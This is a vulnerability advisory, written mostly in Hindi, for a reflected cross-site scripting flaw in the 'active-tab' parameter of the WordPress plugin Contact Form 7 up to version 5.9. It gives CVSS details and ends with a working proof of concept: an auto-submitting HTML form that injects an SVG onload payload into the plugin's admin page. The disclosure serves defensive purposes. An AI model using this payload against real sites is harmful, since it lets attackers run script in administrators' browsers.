
Contact Form 7 <= 5.9 - परावर्तित क्रॉस-साइट स्क्रिप्टिंग
Contact Form 7 <= 5.9 - Reflected Cross-Site Scripting
वर्डप्रेस के लिए Contact Form 7 प्लगइन, संस्करण 5.9 तक (5.9 सहित) सभी संस्करणों में 'active-tab' पैरामीटर के माध्यम से Reflected Cross-Site Scripting भेद्यता के प्रति संवेदनशील है, क्योंकि इनपुट सैनिटाइज़ेशन और आउटपुट एस्केपिंग अपर्याप्त है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए पृष्ठों में मनमाना वेब स्क्रिप्ट इंजेक्ट करना संभव बनाता है, जो तब निष्पादित होती हैं यदि वे किसी उपयोगकर्ता को लिंक पर क्लिक करने जैसी क्रिया करने के लिए सफलतापूर्वक धोखा दे सकते हैं।
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
आपको उस पोस्ट आईडी का मान जानना आवश्यक है जिस पर फ़ॉर्म स्थित है, अन्यथा जब एडमिन लिंक पर क्लिक करेगा तो यह काम नहीं करेगा। कुल मिलाकर, इसके लिए आवश्यक विशेषाधिकार H होना चाहिए, क्योंकि लिंक पर क्लिक करने के लिए एडमिन की आवश्यकता होती है।
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>